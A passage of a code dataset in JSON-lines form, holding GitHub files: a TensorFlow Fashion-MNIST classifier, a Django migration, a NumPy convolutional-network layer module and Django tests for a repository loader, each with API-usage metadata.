thisplot[predicted_label].set_color('red')\n 
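# the true label's bar is set blue below; a correct prediction overwrites the red bar\n 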
thisplot[true_label].set_color('blue')\n\n\n # Define the Fashion-MNIST clothing dataset\n fashion_mnist = tf.keras.datasets.fashion_mnist\n\n # Load the variables\n (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n # Captions corresponding to the numbers in labels\n class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n # Demonstration of a single image\n \"\"\"\n plt.figure()\n plt.imshow(train_images[1])\n plt.colorbar()\n plt.grid(False)\n plt.show()\n \"\"\"\n\n # Scale the 0-255 values to 0-1\n train_images = train_images / 255.0\n test_images = test_images / 255.0\n\n # Demonstration of the first 25 images with their captions\n \"\"\"\n plt.figure(figsize=(10,10))\n for i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\n plt.show()\n \"\"\"\n\n model = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(10)\n ])\n\n # Define the ADAM optimizer that trains the network\n optimizer = tf.keras.optimizers.Adam(lr=0.001, decay=1e-6)\n\n # Define the loss function that computes the error\n loss_function = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n\n # Define the complete model with its functions\n model.compile(optimizer=optimizer, loss=loss_function, metrics=['accuracy'])\n\n # Train the network\n model.fit(train_images, train_labels, epochs=8)\n\n # Check the accuracy on the test data\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\n print('\\nTest accuracy:', test_acc)\n\n # print(model.predict(test_images))\n\n # Define a single-layer network that converts the model's outputs to the (0, 1) range using the SOFTMAX function\n probability_fn = tf.keras.Sequential([model, tf.keras.layers.Softmax()])\n\n # Predict the images\n predictions = probability_fn.predict(test_images)\n\n # Display the index of the largest score\n # np.argmax(predictions[0])\n\n num_rows = 10\n num_cols = 3\n num_img = num_rows * num_cols\n plt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))\n for i in range(num_img):\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)\n plot_image(i, predictions[i], test_labels, test_images)\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)\n plot_value_array(i, predictions[i], test_labels)\n plt.tight_layout()\n plt.show()", "repo_name": "NukeeMann/learn_tensorflow", "sub_path": "Basic_image_calssification_2/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3952, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.grid", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 14, "usage_type": "attribute"}, 
{"api_name": "numpy.argmax", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Softmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "33409532586", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n 
('base_app', '0012_auto_20160406_1155'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HostingPartner',\n fields=[\n ('partner', models.OneToOneField(to='base_app.Partner', serialize=False, primary_key=True)),\n ],\n ),\n ]\n", "repo_name": "rizplate/Loki", "sub_path": "loki/base_app/migrations/0013_hostingpartner.py", "file_name": "0013_hostingpartner.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "16225739899", "text": "\"\"\"\nCreated on Aug 26, 2014\n\n@author: Simon Hohberg\n\"\"\"\nimport numpy as np\nimport scipy.signal.signaltools as signal\nimport utils.numpyutils as nputils\n\n\nclass ConvLayer(object):\n \"\"\"\n Convolution layer in a convolutional neural network. When doing feedforward\n this layer convolves the inputs with randomly initialized kernels (filters)\n of the configured size. The number of neurons is the same as the number of\n output feature maps. There is a kernel for each previous feature map (input)\n and feature map of this layer (fully connected).\n \"\"\"\n\n def __init__(self, num_prev_maps, num_maps, kernel_size, activation_func=np.tanh, deriv_activation_func=nputils.tanh_deriv):\n \"\"\"\n Creates a new fully connected convolution layer with a kernel for each\n previous feature map and feature map of this layer resulting in\n num_prev_maps * num_maps kernels plus a bias for each kernel. Kernels\n and biases are randomly initialized in the range [-0.5, 0.5].\n :param num_prev_maps: Number of previous layers' output feature maps\n :param num_maps: Number of output feature maps for this layer, i.e.\n number of neurons\n :param kernel_size: Size of the kernels (filters) to be used for\n convolution\n :param activation_func: Activation function that is used by the neurons\n :param deriv_activation_func: Derivative function for given\n activation function. 
Calculates the derivative from the activation\n functions outputs.\n \"\"\"\n self.num_prev_maps = num_prev_maps\n self.num_maps = num_maps\n self.kernel_size = kernel_size\n fan_in = np.sqrt(kernel_size * kernel_size * num_prev_maps)\n # kernels/filters for each connection from the previous layer's feature\n # maps to the feature maps of this layer, indexes:\n # [index of feature map in previous layer,\n # index of feature map in this layer, row, column]\n # -> weights[0, 1] is the filter between feature map 0 of the previous\n # layer and feature map 1 of this layer\n self.weights = np.random.uniform(low=-1/fan_in, high=1/fan_in, size=(num_prev_maps, num_maps, kernel_size, kernel_size))\n self.biases = np.zeros(num_maps) # np.random.rand(num_maps)-0.5\n self.activation_func = activation_func\n self.deriv_activation_func = deriv_activation_func\n self.inputs = None\n self.outputs = None\n self.deltas = None\n self.gradients = None\n\n def feedforward(self, inputs):\n \"\"\"\n Calculates output of this layer from the given input.\n :param inputs: 3D or 2D numpy array, if 3D, first dimension: idx of prev\n feature map, second and third dimension: image output of this feature\n map, if 2D just a single image.\n :return 3D numpy array, 2D numpy array output for each feature map\n \"\"\"\n if len(np.shape(inputs)) == 2:\n inputs = np.array([inputs])\n self.inputs = np.copy(inputs)\n in_size = np.shape(self.inputs[0])\n out_shape = (in_size[0] - self.kernel_size + 1, in_size[1] - self.kernel_size + 1)\n self.outputs = np.zeros((self.num_maps, out_shape[0], out_shape[1]))\n # go through all feature maps of this layer\n for fm_idx in range(self.num_maps):\n bias = self.biases[fm_idx]\n conv_out = np.zeros(out_shape)\n # convolve inputs with weights and sum the results\n for prev_fm_idx in range(self.num_prev_maps):\n kernel = self.weights[prev_fm_idx, fm_idx]\n prev_out = self.inputs[prev_fm_idx]\n conv_out += signal.convolve2d(prev_out, kernel, mode='valid')\n # add bias and apply activation function for final output\n self.outputs[fm_idx] = self.activation_func(conv_out + bias)\n if out_shape == (1, 1):\n return np.array([self.outputs[:, 0, 0]])\n return self.outputs\n\n def backpropagate(self, error):\n \"\"\"\n Backpropagation based on given error.\n :param error: Error for this layer (backpropagated error)\n :return Error of the previous layer\n \"\"\"\n if self.outputs is None:\n raise ValueError(\"Feedforward has to be performed before backpropagating!\")\n\n out_size = np.shape(self.outputs[0])\n # has the same size as the input for each previous feature map\n backprop_error = np.zeros((self.num_prev_maps, out_size[0] + self.kernel_size - 1, out_size[1] + self.kernel_size - 1))\n self.deltas = np.zeros((self.num_maps, out_size[0], out_size[1]))\n\n # calculate deltas for this layer\n for fm_idx in range(self.num_maps):\n fm_error = error[fm_idx]\n # calculate deltas for feature map\n # supposing that the derivation function takes the function value as\n # input\n derived_input = self.deriv_activation_func(self.outputs[fm_idx])\n self.deltas[fm_idx] = fm_error * derived_input\n\n # calculate errors for previous layer's feature maps: cross-correlate\n # each feature map's delta with the connection's kernel, the sum over\n # all these correlations (actually only those that have a connection to\n # the previous feature map, here: fully connected) is the delta for the\n # feature map in the previous layer\n for prev_fm_idx in range(self.num_prev_maps):\n for fm_idx in range(self.num_maps):\n # 
correlate delta with kernel using 'full' mode, to obtain the\n # error for the feature map in the previous layer\n kernel = self.weights[prev_fm_idx, fm_idx]\n # 'full' mode pads the input on all sides with zeros increasing\n # the overall size of the input by kernel_size-1 in both\n # dimensions ( (kernel_size-1)/2 on each side)\n fm_error = signal.correlate2d(self.deltas[fm_idx], kernel, mode='full')\n backprop_error[prev_fm_idx] += fm_error\n return backprop_error\n\n def calc_gradients(self):\n \"\"\"\n Calculate the gradients for the kernels of this layer.\n \"\"\"\n self.gradients = np.zeros((self.num_prev_maps, self.num_maps, self.kernel_size, self.kernel_size))\n for fm_idx in range(self.num_maps):\n for prev_fm_idx in range(self.num_prev_maps):\n prev_fm_output = self.inputs[prev_fm_idx]\n fm_delta = self.deltas[fm_idx]\n kernel = self.weights[prev_fm_idx, fm_idx]\n # the gradient is the product of the delta and the activation.\n # However, here all pixels influenced by a weight have to be\n # considered.\n fm_gradient = nputils.rot180(signal.correlate2d(prev_fm_output, fm_delta, mode='valid'))\n self.gradients[prev_fm_idx, fm_idx] = fm_gradient\n\n def update(self, learning_rate):\n for fm_idx in range(self.num_maps):\n self.biases[fm_idx] -= learning_rate * np.sum(self.deltas[fm_idx])# * np.power(self.kernel_size, 2) * self.num_prev_maps\n for prev_fm_idx in range(self.num_prev_maps):\n fm_gradient = self.gradients[prev_fm_idx, fm_idx]\n self.weights[prev_fm_idx, fm_idx] -= learning_rate * fm_gradient\n\n def set_params(self, params):\n pass\n\nclass MaxPoolLayer(object):\n \"\"\"\n Layer that takes a number of feature maps and applies max-pooling producing\n the same number of feature maps as where fed into this layer when doing\n feedforward.\n \"\"\"\n\n def __init__(self, size, num_maps, activation_func=np.tanh, deriv_activation_func=nputils.tanh_deriv):\n \"\"\"\n Creates a new layer that applies max pooling to each non-overlapping\n size * size square of the given inputs.\n :param size: Size of the square that is used for max pooling\n \"\"\"\n self.size = size\n self.num_maps = num_maps\n self.in_shape = None\n self.weights = np.random.random(num_maps) - 0.5\n self.biases = np.zeros(num_maps)\n self.activation_func = activation_func\n self.deriv_activation_func = deriv_activation_func\n self.output = None\n self.down_in = None\n self.deltas = None\n self.gradients = None\n\n def feedforward(self, inputs):\n \"\"\"\n Applies max-pooling to the given input image with this layer's factor.\n The image is scaled down by this factor.\n :param inputs: 3D numpy array, a number of images that will be\n max-pooled one by one\n :return 3D or 1D numpy array, the same number of images as the input but\n each scaled down by this layer's factor. 
Output is 1D (row-vector) iff\n the output of a feature map is only a single pixel.\n \"\"\"\n self.in_shape = np.shape(inputs)\n fm_out_shape = (np.ceil(self.in_shape[1] / float(self.size)), np.ceil(self.in_shape[2] / float(self.size)))\n self.down_in = np.zeros((self.num_maps, fm_out_shape[0], fm_out_shape[1]))\n self.output = np.zeros((self.in_shape[0], fm_out_shape[0], fm_out_shape[1]))\n for fm_idx in range(np.shape(inputs)[0]):\n weight = self.weights[fm_idx]\n bias = self.biases[fm_idx]\n self.down_in[fm_idx] = max_pool(inputs[fm_idx], self.size)\n # self.output[fm_idx] = self.activation_func(weight * self.down_in[fm_idx] + bias)\n self.output[fm_idx] = self.down_in[fm_idx]\n out = self.output\n # when there is only a single pixel as output, return a vector\n if fm_out_shape == (1, 1):\n out = np.array([out[:, 0, 0]])\n return out\n\n def backpropagate(self, error):\n self.deltas = np.zeros(self.output.shape)\n error_shape = np.shape(error)\n backprop_error = np.zeros((error_shape[0], self.in_shape[1], self.in_shape[2]))\n for fm_idx in range(self.num_maps):\n fm_error = error[fm_idx]\n # fm_weight = self.weights[fm_idx]\n # deriv_input = self.deriv_activation_func(self.output[fm_idx])\n # self.deltas[fm_idx] = deriv_input * fm_error\n backprop_error[fm_idx] = tile(fm_error, self.size)#trans.resize(fm_weight * self.deltas[fm_idx], (self.in_shape[1], self.in_shape[2]))\n return backprop_error\n\n def calc_gradients(self):\n self.gradients = np.zeros(self.weights.shape)\n for fm_idx in range(self.num_maps):\n fm_delta = self.deltas[fm_idx]\n fm_gradient = np.sum(self.down_in[fm_idx] * fm_delta)\n self.gradients[fm_idx] = fm_gradient\n\n def update(self, learning_rate):\n return\n for fm_idx in range(self.num_maps):\n self.biases[fm_idx] -= learning_rate * np.sum(self.deltas[fm_idx]) #* np.power(self.kernel_size, 2) * self.num_prev_maps\n fm_gradient = self.gradients[fm_idx]\n self.weights[fm_idx] -= learning_rate * fm_gradient\n\n\ndef max_pool(img, size):\n \"\"\"\n Applies max-pooling to the given 2D numpy array using non-overlapping\n squares of size * size pixels. 
Resulting in a 2D numpy array that is\n scaled by 1/size.\n :param img: Input 2D numpy array that is max-pooled\n :param size: Size of the square used for max-pooling\n :return: Max-pooled 2D numpy array scaled by 1/size\n \"\"\"\n img_shape = np.shape(img)\n # pad vertically with -1\n if img_shape[0] % size != 0:\n img = np.vstack((img, np.ones((size - img_shape[0] % size, img_shape[1])) * -1))\n img_shape = np.shape(img)\n # pad horizontally with -1\n if img_shape[1] % size != 0:\n img = np.hstack((img, np.ones((img_shape[0], size - img_shape[1] % size)) * -1))\n img_shape = np.shape(img)\n result = np.zeros((img_shape[0] / size, img_shape[1] / size))\n for row in range(0, img_shape[0]-size+1, size):\n for col in range(0, img_shape[1]-size+1, size):\n result[row/size, col/size] = np.max(img[row:row + size, col:col + size])\n return result\n\ndef avg_pool(img, size):\n img_shape = np.shape(img)\n # pad vertically with -1\n # if img_shape[0] % size != 0:\n # img = np.vstack((img, np.ones((size - img_shape[0] % size, img_shape[1])) * -1))\n # img_shape = np.shape(img)\n # # pad horizontally with -1\n # if img_shape[1] % size != 0:\n # img = np.hstack((img, np.ones((img_shape[0], size - img_shape[1] % size)) * -1))\n # img_shape = np.shape(img)\n result = np.zeros((img_shape[0] / size, img_shape[1] / size))\n for row in range(0, img_shape[0]-size+1, size):\n for col in range(0, img_shape[1]-size+1, size):\n result[row/size, col/size] = np.average(img[row:row + size, col:col + size])\n return result\n\ndef tile(img, size):\n \"\"\"\n Tiles each pixel in the given image 'size' times. This is meant to be used\n as inverse operation to max-pooling.\n :param img: 2D numpy array\n :param size: number how often each pixel is tiled in each dimension\n :return: 2D numpy array whose size is increased 'size' times in each\n dimension\n \"\"\"\n img_shape = np.shape(img)\n result = np.zeros((img_shape[0] * size, img_shape[1] * size))\n for row in range(img_shape[0]):\n for col in range(img_shape[1]):\n result[row * size:(row + 1) * size, col * size:(col + 1) * size] = img[row, col]\n return result", "repo_name": "xapharius/mrEnsemble", "sub_path": "Engine/src/algorithms/neuralnetwork/convolutional/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 13450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.tanh", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.numpyutils.tanh_deriv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.numpyutils", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools.convolve2d", "line_number": 77, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 77, "usage_type": "name"}, 
{"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools.correlate2d", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.numpyutils.rot180", "line_number": 137, "usage_type": "call"}, {"api_name": "utils.numpyutils", "line_number": 137, "usage_type": "name"}, {"api_name": "scipy.signal.signaltools.correlate2d", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 137, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.numpyutils.tanh_deriv", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.numpyutils", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 278, "usage_type": "call"}]} +{"seq_id": "69804020994", "text": "# -*- coding: utf-8 -*-\n# Python 3.6\n#\n# Author: Coumes Quentin Mail: qcoumes@etud.u-pem.fr\n# Created: 2017-03-16\n# Last Modified: 2017-03-16\n\nimport os, shutil\n\nfrom django.test import TestCase\nfrom django.shortcuts import get_object_or_404\n\nfrom 
gitload.base import Repository, PLTP_Loader\nfrom gitload.models import Loaded_Pltp, Loaded_Pl\n\nfrom serverpl.settings import MEDIA_ROOT\n\n\n\n\nclass TestGetRepository(TestCase):\n \n def test_get_repo_pulled(self):\n \"\"\" Check if the repository has been correctly cloned when get_repo() returns True. Need an internet connection. \"\"\"\n repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.assertTrue(repo.get_repo())\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/gitload_test\"))\n if (os.path.exists(MEDIA_ROOT+\"/gitload_test\")):\n shutil.rmtree(MEDIA_ROOT+\"/gitload_test\")\n \n def test_get_repo_false(self):\n \"\"\" Check if get_repo() correctly returns False when the URL is wrong. Need an internet connection. \"\"\"\n repo = Repository(\"https://repo.com/fake.git\")\n self.assertFalse(repo.get_repo())\n if (os.path.exists(MEDIA_ROOT+\"/fake\")):\n shutil.rmtree(MEDIA_ROOT+\"/fake\")\n\n\n\nclass TestRepository(TestCase):\n \n @classmethod\n def setUpClass(self):\n \"\"\" Set a repo for the following test \"\"\"\n self.repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.repo.get_repo()\n \n @classmethod\n def tearDownClass(self):\n \"\"\" Delete the test repo at the end of the tests \"\"\"\n if (os.path.exists(MEDIA_ROOT+\"/gitload_test\")):\n shutil.rmtree(MEDIA_ROOT+\"/gitload_test\")\n \n def setUp(self):\n \"\"\" Set the cursor to the repo root before every test \"\"\"\n self.repo.cd()\n \n \n def test_cd(self):\n \"\"\" Check if cd() correctly changes Repository.local_current_path. Need an internet connection. \"\"\"\n self.repo.cd(\"PLTP\")\n self.assertEqual(self.repo.local_current_path, self.repo.local_root + \"/PLTP/\")\n self.repo.cd()\n self.assertEqual(self.repo.local_current_path, self.repo.local_root)\n \n def test_parse_content(self):\n \"\"\" Check if parse_content() correctly lists every file. Need an internet connection. 
\"\"\"\n self.repo.cd(\"PLTP\")\n self.repo.parse_content()\n self.assertEqual(self.repo.local_pltp_list, [\"test.pltp\"])\n self.assertEqual(self.repo.local_other_list, [\"autosubsets.pl\"])\n self.assertEqual(self.repo.local_dir_list, [\"function\"])\n \n def test_load_pltp(self):\n \"\"\" Check if load_pltp() correctly create an instance of PLTP_Loader \"\"\"\n self.assertIsInstance(self.repo.load_pltp(\"/PLTP/test.pltp\"), PLTP_Loader)\n\nclass TestPLTPLoader(TestCase):\n \n @classmethod\n def setUpClass(self):\n \"\"\" Set a repo for the following test \"\"\"\n self.repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.repo.get_repo()\n self.loader = self.repo.load_pltp(\"/PLTP/test.pltp\")\n \n @classmethod\n def tearDownClass(self):\n if (os.path.exists(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version)):\n shutil.rmtree(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version)\n if (os.path.exists(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version)):\n shutil.rmtree(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version)\n \n def test_load_file(self):\n \"\"\" Check if every file are correctly loaded \"\"\"\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version))\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version))\n \n def test_load_data_base(self):\n \"\"\" Check if every information are present in the data base after loading \"\"\"\n pltp = get_object_or_404(Loaded_Pltp, name=\"test\")\n pl = pltp.loaded_pl_set.all()\n \n self.assertEqual(pltp.name, \"test\")\n #test json\n \n self.assertEqual(len(pl), 2)\n \n self.assertEqual(pl[0].name, \"test1\")\n #test dirname + json\n self.assertEqual(pl[1].name, \"test2\")\n #test dirname + json\n \n \n \n", "repo_name": "plgitlogin/server-pl", "sub_path": "gitload/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4201, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 21, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 28, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 29, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 29, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 35, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 36, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 40, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, 
{"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 51, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 52, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 52, "usage_type": "name"}, {"api_name": "gitload.base.PLTP_Loader", "line_number": 76, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 78, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 89, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 90, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 90, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 91, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 92, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": 